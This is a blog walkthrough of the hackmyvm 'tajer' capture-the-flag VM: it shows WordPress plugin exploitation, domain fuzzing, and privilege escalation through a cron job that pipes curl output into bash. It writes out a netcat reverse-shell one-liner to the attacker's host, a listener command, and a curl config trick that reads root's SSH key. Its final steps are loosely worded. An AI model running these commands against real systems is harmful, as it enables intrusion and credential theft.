The free CTF Challenge web site “hackmyvm.eu” have another medium level vm called ‘tajer‘ for us to download, enumerate and grab some flags. In this write-up will try to describe my method and thought process on how I (barely) completed the hackmyvm ‘tajer’ CTF challenge.
Table of Contents
Setup
The tajer vm can be downloaded from hackmyvm.eu as an OVA file and imported into Oracle VirtualBox.
My Network,
- 192.168.186.150 – This is my BlackArch enumeration system.
- 192.168.186.12 – This is the tajer vm.
For enumeration of the hackmyvm tajer Challenge I will be using my BackArch system build that I created in a previous blog post. You can use any Kali, BlackArch, Parrot or just standard Linux to proceed. You will also need the psp64 binary copied onto the server.
Video
I recorded my walk through session. Not much talking but maybe makes it a bit clearer.
Enumeration
Some rooms are just hard to emulate and this is one of them. So I really struggled to get the first step with this one. There was a clue in the name. If you google “Tajer exploit” you come up with some results that point to a serious bug in a tajer plugin for wordpress. Its also a point to be aware that on hackmyvm.eu the vms tend to use a .hmv domain suffex.
nmap
nmap -p- 192.168.186.12
The Nmap results are only http and ssh.
A quick look at the page showed up little of use.
Fuzzing
This was the hardest part of the room. Gobuster, dirb, nmap showed up nothing useful. So after a hint I looked into domain fuzzing. Eventually after fuzzing and fuzzing I came up with the below command. The hmv domain suffix is popular with the vms on the hackmyvm website.
wfuzz -c -w /opt/directory-list-2.3-medium.txt -u http://tajer.FUZZ.hmv --ip 192.168.186.12 --hl=25
Next step is to add a entry into my local /etc/hosts file to match this.
192.168.186.12 tajer.wordpress.hmv
Tajer
So we have a wordpress site. I ran the wpscan utility to enumerate the wordpress site and found the it has the tajer vulnerablity.
wpscan -url http://tajer.wordpress.hmv --api-token=<api-token>
You need an api token for wpscan but you can get one for free on their website.
Follow the method linked to upload a rev shell php script.
More Enumeration
The user we have at the moment is not much good so we have to enumerate and move to a more useful user.
pspy64
Copy over and start running psp64 and it reveals that there is a “interesting” cron job running every minute.
Cron
/usr/bin/bash -c /usr/bin/bash < <(/usr/bin/curl -s http://password.wordpress.hmv/k3vin)
So this is running the /user/bin/bash against the output of the command
/usr/bin/curl -s http://password.wordpress.hmv/k3vin
DNS
However it seems that there is no dns record for password.wordpress.hmv. So I had to make one in my local dns server that points tajer.wordpress.hmv to the ip address of my enumeration system (192.168.186.150). So when the tajer vm boots up it uses dhcp of my network and grabs my dns server. Once I have that sorted next step is to run a python web server on port 80 of the enumeration system.
But first I have to create a php file called k3vin which will spawn a reverse shell. this file will contain the contents
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 192.168.186.150 1235 >/tmp/f
Then on your enumeration host, have a netcat lister running.
nc -vnlp 1235
All going well, in less 60 seconds this will spawn a shell for the user “kevin” and you can read the user.txt.
Again with the Enumeration
If you have pspy64 running still then leave it running. Other wise start it up and have it running somewhere you can see it.
Interesting Files
Eventually you will find the /opt/scripts and /opt/kevin directories. The former is more interesting to us as the latter is empty. There are two files. curl.py which we can’t read and code which is complied python code.
The tajer host does not have strings installed so I had to copy the file back to my enumeration system to run strings against the code file.
Strings on Code
The only thing i found of interest here is the line “/opt/kevin/input.txt”. It does not exists.
What happens if we create it with some text.
echo abcd >/opt/kevin/input.txt
pspy64 again
in the window with pspy64 running we have a new commands pop up.
/bin/sh -c [ -f /opt/kevin/input.txt ] && /opt/scripts/curl.py sh -c /bin/bash -c 'curl -o /tmp/result_18_38_01 -K abcd'
So the logic is something like, if /opt/kevin/input.txt exists, then run /opt/scripts/curl.py
And then curl.py is running
sh -c /bin/bash -c 'curl -o /tmp/result_18_38_01 -K abcd'
curl
This is interesting, its a curl command that runs with the -K options. This option points at a file so the contents of /opt/kevin/input.txt is pointing to a curl config file which outputs to a file in /tmp/result*
So if we have the following curl config in the file /tmp/abcd
url = file:///root/.ssh/id_pub
And in the file /opt/kevin/input we have the contents
/tmp/abcd
So now you have the root key, you can do what you want.
Wrap up
Not sure if I had fun or I nearly lost my mind. I am a bit numb after this one. Any comments leave them below.
Be First to Comment